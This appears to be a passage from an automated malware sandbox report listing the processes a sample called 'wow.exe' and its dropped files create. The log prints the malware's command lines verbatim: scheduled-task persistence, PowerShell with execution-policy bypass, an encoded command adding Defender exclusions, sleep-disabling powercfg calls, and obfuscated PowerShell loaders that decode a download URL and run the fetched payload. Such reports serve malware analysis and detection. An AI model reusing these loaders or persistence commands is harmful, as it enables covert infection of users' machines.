                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\vapo.exe "C:\Users\user\Downloads\haus\vapo.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\T.exe "C:\Users\user\Downloads\haus\T.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\conhost.exe "C:\Users\user\Downloads\haus\conhost.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\WatchDog.exe "C:\Users\user\Downloads\haus\WatchDog.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\Enalib.exe "C:\Users\user\Downloads\haus\Enalib.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Lovform.vbs" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Rodham.vbs" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Fuldautomatiseres.vbs" Jump to behavior
                            Source: C:\Users\user\Downloads\haus\sel1.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
                            Source: C:\Users\user\Downloads\haus\traf.exeProcess created: unknown unknown
                            Source: C:\Users\user\Downloads\haus\vapo.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "vapo" /tr "C:\Users\user\AppData\Roaming\vapo.exe"
                            Source: C:\Users\user\Downloads\haus\T.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\T.exe' 'C:\ProgramData\1be588a5b7\T.exe' -Force
                            Source: C:\Users\user\Downloads\haus\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                            Source: C:\Users\user\Downloads\haus\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            Source: C:\Users\user\Downloads\haus\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6620" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\Enalib.exe' 'C:\ProgramData\1be588a5b7\Enalib.exe' -Force
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Svrte; function Bebrejd($Stomode){$Gemologist=3;do{$Uncountervailed+=$Stomode[$Gemologist];$Gemologist+=4} until(!$Stomode[$Gemologist])$Uncountervailed}function Shoepacs137($Typhobacillosis){ .($Facies) ($Typhobacillosis)}$Reprsentationsudgifts=Bebrejd 'jouN oEVi TSni.SorW';$Reprsentationsudgifts+=Bebrejd 'UnheBenBSubCHa,LA ti BaeManN loT';$Landboforenings173=Bebrejd 'PolMLinoTouzB ni PrlMadl craVaf/';$Shirra=Bebrejd 'KnoTBoolI tssuz1Br 2';$Boligkonsulentens=' St[Norn onEdk.T bo..fvSEn EFrkRPervBryi eacInfePrepHydOexti onNDamtDyrMPavAFreNSejAUveG u eGenrNeu]Aar: el:LassSaeeFedc nuRafR StiFedTHanY idPEnjrAf.OlottCigo ruCOv O SmLBro=Kal$ djs kkhNyhi yrRTriR hea';$Landboforenings173+=Bebrejd 'Co 5Un . ss0 Sk .ig( A WCoriBr,n I dFaroUdfwSlasMng conN,anTIll Fe1M.c0 Bo.Ha.0Ypp;Gen GloWHjliInsnCaf6 an4flu; Un gsx Fi6Chr4 Pr;Dik S crForv C.:Per1 St3 ow4Ind. rn0Arn) I IneGFale DucpotkShioRes/Bo 2,aa0La 1Nig0kv 0 ev1Bod0For1Skr an,F itiUnsrBane nfM aoS uxSti/kon1N l3 dg4Drm.d.u0';$Bramantip=Bebrejd ' ru ShsDeleF rRDmp- ShATr gSmiEMilNAmbt';$Forskrev=Bebrejd 'SmahPapttvatFempChesSte:F r/Sy,/ ShfS ni MolJete udBaanHex.K,aeS iuTax/nivlNeumLaejKamMgen1 gtIOvetA.kibroFJarCSwiHBocjU cYK eABe 4KapJRauNBruRA aBMerYModBTr 3Mar4Sc / SaUUnonS cdbareon r vb Opa Akl ydaSelnDelcAboe rurStan,oleHjasTwi.tarjBebaS ovMana';$Sjaslikkens247=Bebrejd ' Op>';$Facies=Bebrejd 'NonITraE SuX';$Torrentially21='Topazolite';$Gordiaceous='\Transitvarerne.Fli';Shoepacs137 (Bebrejd 'F.l$HjfGAfsl leOAerb BraTeaL n:IrrPForR.dde heGNebn .peIn NBadoForlGr OUn,nopfEpre9Str4.il=gol$gi EnedN,kiv,ph:sydA VeP EkPge DMetAResTRe,aDec+ind$Plag NooDelRAskD NaI,ilaUnscAlpeTh Oas,uXylS');Shoepacs137 (Bebrejd 'lan$RetG E,l TiORelBLjba polO e: Fos utyTruDRekFTavO ViR ,ahPaeN,pig ScEAukNUnsE.ty= Se$ A,F.beO.ndrS.rSS ckKolRProEEnsV Dr..xcsEjePRutLsatIhottDyn(Ego$ uts E j InaBruSAbsl E i.usKKlikkoneLivN .as va2.pl4Hex7 u)');Shoepacs137 (Bebrejd $Boligkonsulentens);$Forskrev=$Sydforhngene[0];$Smutches=(Bebrejd 'Com$ ImgPreLTitOWaxbStraPrelTre: AusAf ASilP FiSFedU .oCAfgKI gEIncRSpaSLo =Runn aE VawMor- ndoPa.b,enJRapeF,dc.onTU,m OgdsPl,YH,nS,inTQuiE ,im Li..ta$SecRSjlETriPBruRT.iSNonEAntn,ouT B.ARotT eIGenO .yNSkrsCosu end BlGSupI nfGimt .ds');Shoepacs137 ($Smutches);Shoepacs137 (Bebrejd ' h$CatSUnoaTampnrrs TuuDescSnikEnde FerTo s pu.BnkH E,e tea VedLumeRebrBilsSub[Op $ unBZerrAlba Inm braVe npartSpoiKonp,ta]Tel= L $,peLOu a tonBuddTikbP roignf iso Oprbr eEftnFabiFornJasgSensMe 1Ens7 Sn3');$Udfordrernes229=Bebrejd 'P.d$SkaSJ.ra BrpAr.s F,uCouc PekHoleE sr Cos xy.S dD ,no raw knnRefl Bio Sna Bud,epFAboiPrelTwieFol( Sp$CanF Gro rerCyms P.kNewrSomeChrvInv,Bev$ForKIvrohavaPenlt piNert E i B.oO tnT.ie .nn C,s Al)';$Koalitionens=$Pregnenolone94;Shoepacs137 (Bebrejd 'Sku$S,oGInclGusoReib SyaDisLFol:BesnStrOSurnPalROvie ,uM OvEImmdL,gITh aTorb WaLScaEC u=Gaa( ArTBlaeHersRg.tSup-
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uforfrdetheds181; function Yasmak($Unsatanical){$Puritanic=3;do{$Joumbos+=$Unsatanical[$Puritanic];$Puritanic+=4} until(!$Unsatanical[$Puritanic])$Joumbos}function Seksualhygiejnen($Unshowmanlike){ .($bluenoser) ($Unshowmanlike)}$Calamondin=Yasmak 'T nn onEchaTGra.Ke W';$Calamondin+=Yasmak 'Jo EU sbSt,cCoulHarI.tue InnRebT';$Longwise=Yasmak 'ForMMi.oSorzGaviF rl,irlA faEnt/';$Stavkirkes=Yasmak ' AmTovel WasI n1Avn2';$Litterateur36='S.e[Plan .oeFreTFus.BusS IneT urSamv TaI Brc HueN npCe oMiniBilNOliTAtoMFimA AknLenAIvrGHese arUnc] Mo: a:halSAfkEElecF ruLilrMyxID rtMacY,egPPetrProo .aT,alo NoCAtooP rl B = re$ .aST xtMisA GavEmbKUdkiAccRfemkPreeForS';$Longwise+=Yasmak 'Low5 k .me 0Ov Snd(YasWUnhi,ocnUnbdNovoTrawM ds Sp OveNAnmTFra Ine1 ic0.nt. tr0Kli; ro AttWAkviI dn Un6 Ba4Lab;Fi, K txPre6Hel4No ;,cc BrrDisvOv : h1Pra3Muf4 H .Qu 0Sup) Un F rG .neKyscG.sk,amoGrn/Liv2Fra0Ank1Res0Non0 Pa1Can0 an1Mio ConFA.yigu.rLg e .yf FioHypxMa,/Kvl1Br 3Lns4Tra. on0';$Daarlighed=Yasmak 'midU UnSRepeT arVes-StrAFakG UneProN M T';$Radioactive=Yasmak ' Mah ertExotSkipA,ts nd:,at/pol/ComfNoni ilEt eSamdUnan.ro.floe H uLis/IntlordmAffjBonM ny1ManI .nt Tai,beFBruCE,uHIrrjkoeYFisATer4ApaJDahNOphRWeeBSvvYForB a3Ly 4B,f/ OvODepuHomt ResForoH ba .ar if. artPelo R c';$Stbeformens=Yasmak 'San>';$bluenoser=Yasmak 'SkriProeTilx';$Courtmartial='Hale';$Bacillebrerens='\Autonephrectomy.Noc';Seksualhygiejnen (Yasmak 'Pre$ForGHjeLUndoSchb MoaHallStr:SheUNadnDesCFrdUInhsS.ohAlfiF noLanNGarE orDPr =Ord$ SaEHypNPr.vBe,: UdA rsP N PPaud ekAViqt FuaMal+Bre$LamBPorA apCOutI ,ol arLS.rE rybOver.nmE ToRForET ln.eas');Seksualhygiejnen (Yasmak 'Sla$ Cog HalSjaO,kiBMura ppLRec:IllMA hYBorS CetThrIpolk te,ipr U.efannHal1Enr4Ant1 el= nn$ esr AkALigdG viComOUbna giCSanTerii,akVFore ,a.KursMagp,ncL uiIT oT in(Kmp$RouSAfsTDe BObsETenf ceoDacr PamFliE R nPl sLas)');Seksualhygiejnen (Yasmak $Litterateur36);$Radioactive=$Mystikeren141[0];$Recognise=(Yasmak 'Kip$LgfgBooLPreo DabXenaFinlPre:na eCheNTrnAstymHaleunmL JaI H,nBliGU.hSEla=SpanfulEDecW os- .io xcBO vjIndECouc ,vt P MoS.oaYPres ibt Flesc mr.l.Rad$EkscFugA ptl ,rALi,MEksoStunSupdUpcIKjon');Seksualhygiejnen ($Recognise);Seksualhygiejnen (Yasmak ' Uf$ B E denWuzaCymmPreeMi,l leiBernStagSubsO e. dHBlye Ala .odSp eBi,rUncsKe,[Abi$WalDOr.awyvaKilrBryl,ntiT,lglarhBese,epdEd ]Myr=Sys$.paLKonoRetnNongG nwStuia.tsEjee');$Upcutting173=Yasmak 'S g$Ju,EPr.nChuaFalma,re BrlReriS lnSkagChus Kr.DiaDMoyo tewTr nB tlGlao PoaAk dThyFBe.ihyll uneGem(Phi$SipR InaSupdSariUncoOveaIt cTaatFo iRunvHj e H ,Ta $ irV ,ii OtdRepe anbFloe .og yprH,oetoftBlosLa,1 Ud7 l 9d k)';$Videbegrets179=$Uncushioned;Seksualhygiejnen (Yasmak 'P r$ iGSquLSelopl bBeha arLSka:ScrsCoitTafRC aufrdkPertBakU ivRAr.eUs.RSape ,us Pr=Pa (ColtSplE BrS BaTB l-Ab.pblaA eT lahDec Ser$ .aVlocI edVe EPh BLigECligtror aeO,etFleSFra1De,7S e9Dev)');while (!$Struktureres
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA=="
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6620" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            Source: C:\Users\user\Downloads\haus\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajafcanqb1acmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmaeabhahmavwbkahuatqbxacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajafyabgbcahyarwbfadkasgblacmapgagac0argbvahiaywblacaapaajahmaoabkadaaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajafcanqb1acmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmaeabhahmavwbkahuatqbxacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajafyabgbcahyarwbfadkasgblacmapgagac0argbvahiaywblacaapaajahmaoabkadaaiwa+aa=="
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $uforfrdetheds181; function yasmak($unsatanical){$puritanic=3;do{$joumbos+=$unsatanical[$puritanic];$puritanic+=4} until(!$unsatanical[$puritanic])$joumbos}function seksualhygiejnen($unshowmanlike){ .($bluenoser) ($unshowmanlike)}$calamondin=yasmak 't nn onechatgra.ke w';$calamondin+=yasmak 'jo eu sbst,ccoulhari.tue innrebt';$longwise=yasmak 'formmi.osorzgavif rl,irla faent/';$stavkirkes=yasmak ' amtovel wasi n1avn2';$litterateur36='s.e[plan .oefretfus.buss inet ursamv tai brc huen npce ominibilnolitatomfima aknlenaivrghese arunc] mo: a:halsafkeelecf rulilrmyxid rtmacy,egppetrproo .at,alo nocatoop rl b = re$ .ast xtmisa gavembkudkiaccrfemkpreefors';$longwise+=yasmak 'low5 k .me 0ov snd(yaswunhi,ocnunbdnovotrawm ds sp ovenanmtfra ine1 ic0.nt. tr0kli; ro attwakvii dn un6 ba4lab;fi, k txpre6hel4no ;,cc brrdisvov : h1pra3muf4 h .qu 0sup) un f rg .nekyscg.sk,amogrn/liv2fra0ank1res0non0 pa1can0 an1mio confa.yigu.rlg e .yf fiohypxma,/kvl1br 3lns4tra. on0';$daarlighed=yasmak 'midu unsrepet arves-strafakg unepron m t';$radioactive=yasmak ' mah ertexotskipa,ts nd:,at/pol/comfnoni ilet esamdunan.ro.floe h ulis/intlordmaffjbonm ny1mani .nt tai,befbruce,uhirrjkoeyfisater4apajdahnophrweebsvvyforb a3ly 4b,f/ ovodepuhomt resforoh ba .ar if. artpelo r c';$stbeformens=yasmak 'san>';$bluenoser=yasmak 'skriproetilx';$courtmartial='hale';$bacillebrerens='\autonephrectomy.noc';seksualhygiejnen (yasmak 'pre$forghjelundoschb moahallstr:sheunadndescfrduinhss.ohalfif nolanngare ordpr =ord$ saehypnpr.vbe,: uda rsp n ppaud ekaviqt fuamal+bre$lambpora apcouti ,ol arls.re rybover.nme torforet ln.eas');seksualhygiejnen (yasmak 'sla$ cog halsjao,kibmura pplrec:illma hybors cetthripolk te,ipr u.efannhal1enr4ant1 el= nn$ esr akaligdg vicomoubna gicsanterii,akvfore ,a.kursmagp,ncl uiit ot in(kmp$rousafstde bobsetenf ceodacr pamflie r npl slas)');seksualhygiejnen (yasmak $litterateur36);$radioactive=$mystikeren141[0];$recognise=(yasmak 'kip$lgfgboolpreo dabxenafinlpre:na echentrnastymhaleunml jai h,nbligu.hsela=spanfuledecw os- .io xcbo vjindecouc ,vt p mos.oaypres ibt flesc mr.l.rad$ekscfuga ptl ,rali,meksostunsupdupcikjon');seksualhygiejnen ($recognise);seksualhygiejnen (yasmak ' uf$ b e denwuzacymmpreemi,l leibernstagsubso e. dhblye ala .odsp ebi,runcske,[abi$waldor.awyvakilrbryl,ntit,lglarhbese,epded ]myr=sys$.palkonoretnnongg nwstuia.tsejee');$upcutting173=yasmak 's g$ju,epr.nchuafalma,re brlreris lnskagchus kr.diadmoyo tewtr nb tlglao poaak dthyfbe.ihyll unegem(phi$sipr inasupdsariuncooveait ctaatfo irunvhj e h ,ta $ irv ,ii otdrepe anbfloe .og yprh,oetoftblosla,1 ud7 l 9d k)';$videbegrets179=$uncushioned;seksualhygiejnen (yasmak 'p r$ igsqulselopl bbeha arlska:scrscoittafrc aufrdkpertbaku ivrar.eus.rsape ,us pr=pa (coltsple brs batb l-ab.pblaa et lahdec ser$ .avloci edve eph bligecligtror aeo,etflesfra1de,7s e9dev)');while (!$struktureres
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $praefectorial61; function buxine($frugtavlens){$millimicron=3;do{$hestevognens+=$frugtavlens[$millimicron];$millimicron+=4} until(!$frugtavlens[$millimicron])$hestevognens}function phonetist($timebilletten){ .($procommemoration) ($timebilletten)}$bromphenol=buxine 'varnbelet et.ru.refw';$bromphenol+=buxine 'samelo bskacerolundigrue.rsn.ndt';$bruttotonnagens=buxine ' trmshioangzjoriarbltebldykawal/';$hysses=buxine 'e rtundlknisra 1 es2';$wispiness=' .t[ pn rre ,ot lt.strsredesn rmagvskaisorckeyeeltpmi,o gaiphondebtkr.msrbast.nfeja s.gdelecytr qu]sha:hyd:st sgouejazclocuresrm siej,ta.lyedipob,r siosaltolio b c hion nl ka= s.$unihshoyru salfs vaedans';$bruttotonnagens+=buxine ' fe5unm.su 0fil th(renwfisi emnv,td noomaaw losbl, ufon cot ku gyp1,ro0 sr.bad0sol;,ou fu w veinonnhen6shu4sch;s p dex nr6cat4foc;san kryr u,vafs:cag1 nc3ind4trl.squ0,ou)sur styggenediscskok,vmomas/sac2ge 0 ry1swa0ske0 ro1led0mil1 ft ecf bii hor apeeksf heosvmxd t/par1re.3par4par.tu.0';$procedurereglerne=buxine ' roudiaskrbe w rvra- uastog ste ban.jrt';$isotomous222=buxine 'udmhat t actunlpasysbyg:lev/l,n/nonffililivl foefrsd b,ntrk. beeenkudei/ otlformfurjthymhae1lanifoutsneiforftilcsubharrjurayhasa h 4strjawan fart ebankytrabtom3 sm4wes/ muksnracapnidease r .oipare lrg ne.genbrustet.p.cq ,uxmond';$raukle=buxine 'b,d>';$procommemoration=buxine ' v ifraet.ax';$skiftnings='teglvrksovn';$sbredders='\rten.men';phonetist (buxine ' sc$.erg ,olbanore.bunaa,ral re:spon tio egn enogenwa lnopler mrsem= eh$ a,e,ernhivvpre:cisaeklp fopadudre ab.lt dlasta+ban$rensdykbbacr ned fd,urdstaeautru es');phonetist (buxine 'p e$omvgmodlb lodkbbp rahrelmed: difaalr vaatott enrta ap eecind b esyslv.rs ples,is kodu da i gsene renut =nac$forimins fooovetspro s,mhemocobustosf.r2 po2pea2aff.yonscykpg,sleugi ddt n (unc$datrraaagr uhanktyplpoweg k)');phonetist (buxine $wispiness);$isotomous222=$fratraedelsesdagen[0];$sagnomspundent=(buxine 'c n$uneg ralandoamabsu,asmllobs:up.d.eoepref ose finintebepsskatpi.rhyka unts aekap= trnmaxeprewd s- roomusbhykj unesndctret lo impsu mylacsd wtviseha.mfor.ung$u vbi drhouo afm lp wahbu esa ntilome.l');phonetist ($sagnomspundent);phonetist (buxine 'sup$ etdcoue ymfmesefornsp efarsafttlarrfleaugetacce r..ru.he pe elachrdenfeunsr mesarb[dis$nutp arundo wac n,e erdtatumodr poel mrd aeaghgsuplblae.murde nla e iv] t,=bas$renb snr.onustots mteksosentinto bin conpr.apolg ene s.nfles');$plectognathous=buxine 'ank$ irdisoeskmfbule agn o ebeas c tvarrw aaciat o epre.u,rd soovinwn kn yludko svacryd lnftkkispdldemebuk(me.$th io.ksdetogrotanlosupmauto egumonssvi2 m 2 pe2fol,mor$drio i r,std omrfore eb.elesuph reaintnhaad,enlopfipronholgso eghondom)';$ordrebehandlingen=$nonowner;phonetist (buxine 'sor$m,agpr.lnonoopubs ea,vel jo:agrn pui nft axrbj,ou sp.ndh.yny e t ubipercamo= na(bertripela sstrt.nb-s gps laco.tlevhtnk lig$afdorygr olddenrgrued mbsy
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $svrte; function bebrejd($stomode){$gemologist=3;do{$uncountervailed+=$stomode[$gemologist];$gemologist+=4} until(!$stomode[$gemologist])$uncountervailed}function shoepacs137($typhobacillosis){ .($facies) ($typhobacillosis)}$reprsentationsudgifts=bebrejd 'joun oevi tsni.sorw';$reprsentationsudgifts+=bebrejd 'unhebenbsubcha,la ti baemann lot';$landboforenings173=bebrejd 'polmlinotouzb ni prlmadl cravaf/';$shirra=bebrejd 'knotbooli tssuz1br 2';$boligkonsulentens=' st[norn onedk.t bo..fvsen efrkrpervbryi eacinfeprephydoexti onndamtdyrmpavafrensejauveg u egenrneu]aar: el:lasssaeefedc nurafr stifedthany idpenjraf.olottcigo rucov o smlbro=kal$ djs kkhnyhi yrrtrir hea';$landboforenings173+=bebrejd 'co 5un . ss0 sk .ig( a wcoribr,n i dfaroudfwslasmng conn,antill fe1m.c0 bo.ha.0ypp;gen glowhjliinsncaf6 an4flu; un gsx fi6chr4 pr;dik s crforv c.:per1 st3 ow4ind. rn0arn) i inegfale ducpotkshiores/bo 2,aa0la 1nig0kv 0 ev1bod0for1skr an,f itiunsrbane nfm aos uxsti/kon1n l3 dg4drm.d.u0';$bramantip=bebrejd ' ru shsdelef rrdmp- shatr gsmiemilnambt';$forskrev=bebrejd 'smahpapttvatfempchesste:f r/sy,/ shfs ni moljete udbaanhex.k,aes iutax/nivlneumlaejkammgen1 gtioveta.kibrofjarcswihbocju cyk eabe 4kapjraunbrura abmerymodbtr 3mar4sc / sauunons cdbareon r vb opa akl ydaselndelcaboe rurstan,olehjastwi.tarjbebas ovmana';$sjaslikkens247=bebrejd ' op>';$facies=bebrejd 'nonitrae sux';$torrentially21='topazolite';$gordiaceous='\transitvarerne.fli';shoepacs137 (bebrejd 'f.l$hjfgafsl leoaerb brateal n:irrpforr.dde hegnebn .pein nbadoforlgr oun,nopfepre9str4.il=gol$gi enedn,kiv,ph:syda vep ekpge dmetarestre,adec+ind$plag noodelraskd nai,ilaunscalpeth oas,uxyls');shoepacs137 (bebrejd 'lan$retg e,l tiorelbljba polo e: fos utytrudrekftavo vir ,ahpaen,pig sceauknunse.ty= se$ a,f.beo.ndrs.rss ckkolrproeensv dr..xcsejeprutlsatihottdyn(ego$ uts e j inabrusabsl e i.uskklikkonelivn .as va2.pl4hex7 u)');shoepacs137 (bebrejd $boligkonsulentens);$forskrev=$sydforhngene[0];$smutches=(bebrejd 'com$ imgpreltitowaxbstrapreltre: ausaf asilp fisfedu .ocafgki geincrspaslo =runn ae vawmor- ndopa.b,enjrapef,dc.ontu,m ogdspl,yh,ns,intquie ,im li..ta$secrsjletripbrurt.isnoneantn,out b.arott eigeno .ynskrscosu end blgsupi nfgimt .ds');shoepacs137 ($smutches);shoepacs137 (bebrejd ' h$catsunoatampnrrs tuudescsnikende ferto s pu.bnkh e,e tea vedlumerebrbilssub[op $ unbzerralba inm brave npartspoikonp,ta]tel= l $,pelou a tonbuddtikbp roignf iso oprbr eeftnfabifornjasgsensme 1ens7 sn3');$udfordrernes229=bebrejd 'p.d$skasj.ra brpar.s f,ucouc pekholee sr cos xy.s dd ,no raw knnrefl bio sna bud,epfaboipreltwiefol( sp$canf gro rercyms p.knewrsomechrvinv,bev$forkivrohavapenlt pinert e i b.oo tnt.ie .nn c,s al)';$koalitionens=$pregnenolone94;shoepacs137 (bebrejd 'sku$s,oginclgusoreib syadislfol:besnstrosurnpalrovie ,um oveimmdl,gith atorb walscaec u=gaa( artblaehersrg.tsup-
                            Source: C:\Users\user\Downloads\haus\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajafcanqb1acmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmaeabhahmavwbkahuatqbxacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajafyabgbcahyarwbfadkasgblacmapgagac0argbvahiaywblacaapaajahmaoabkadaaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $svrte; function bebrejd($stomode){$gemologist=3;do{$uncountervailed+=$stomode[$gemologist];$gemologist+=4} until(!$stomode[$gemologist])$uncountervailed}function shoepacs137($typhobacillosis){ .($facies) ($typhobacillosis)}$reprsentationsudgifts=bebrejd 'joun oevi tsni.sorw';$reprsentationsudgifts+=bebrejd 'unhebenbsubcha,la ti baemann lot';$landboforenings173=bebrejd 'polmlinotouzb ni prlmadl cravaf/';$shirra=bebrejd 'knotbooli tssuz1br 2';$boligkonsulentens=' st[norn onedk.t bo..fvsen efrkrpervbryi eacinfeprephydoexti onndamtdyrmpavafrensejauveg u egenrneu]aar: el:lasssaeefedc nurafr stifedthany idpenjraf.olottcigo rucov o smlbro=kal$ djs kkhnyhi yrrtrir hea';$landboforenings173+=bebrejd 'co 5un . ss0 sk .ig( a wcoribr,n i dfaroudfwslasmng conn,antill fe1m.c0 bo.ha.0ypp;gen glowhjliinsncaf6 an4flu; un gsx fi6chr4 pr;dik s crforv c.:per1 st3 ow4ind. rn0arn) i inegfale ducpotkshiores/bo 2,aa0la 1nig0kv 0 ev1bod0for1skr an,f itiunsrbane nfm aos uxsti/kon1n l3 dg4drm.d.u0';$bramantip=bebrejd ' ru shsdelef rrdmp- shatr gsmiemilnambt';$forskrev=bebrejd 'smahpapttvatfempchesste:f r/sy,/ shfs ni moljete udbaanhex.k,aes iutax/nivlneumlaejkammgen1 gtioveta.kibrofjarcswihbocju cyk eabe 4kapjraunbrura abmerymodbtr 3mar4sc / sauunons cdbareon r vb opa akl ydaselndelcaboe rurstan,olehjastwi.tarjbebas ovmana';$sjaslikkens247=bebrejd ' op>';$facies=bebrejd 'nonitrae sux';$torrentially21='topazolite';$gordiaceous='\transitvarerne.fli';shoepacs137 (bebrejd 'f.l$hjfgafsl leoaerb brateal n:irrpforr.dde hegnebn .pein nbadoforlgr oun,nopfepre9str4.il=gol$gi enedn,kiv,ph:syda vep ekpge dmetarestre,adec+ind$plag noodelraskd nai,ilaunscalpeth oas,uxyls');shoepacs137 (bebrejd 'lan$retg e,l tiorelbljba polo e: fos utytrudrekftavo vir ,ahpaen,pig sceauknunse.ty= se$ a,f.beo.ndrs.rss ckkolrproeensv dr..xcsejeprutlsatihottdyn(ego$ uts e j inabrusabsl e i.uskklikkonelivn .as va2.pl4hex7 u)');shoepacs137 (bebrejd $boligkonsulentens);$forskrev=$sydforhngene[0];$smutches=(bebrejd 'com$ imgpreltitowaxbstrapreltre: ausaf asilp fisfedu .ocafgki geincrspaslo =runn ae vawmor- ndopa.b,enjrapef,dc.ontu,m ogdspl,yh,ns,intquie ,im li..ta$secrsjletripbrurt.isnoneantn,out b.arott eigeno .ynskrscosu end blgsupi nfgimt .ds');shoepacs137 ($smutches);shoepacs137 (bebrejd ' h$catsunoatampnrrs tuudescsnikende ferto s pu.bnkh 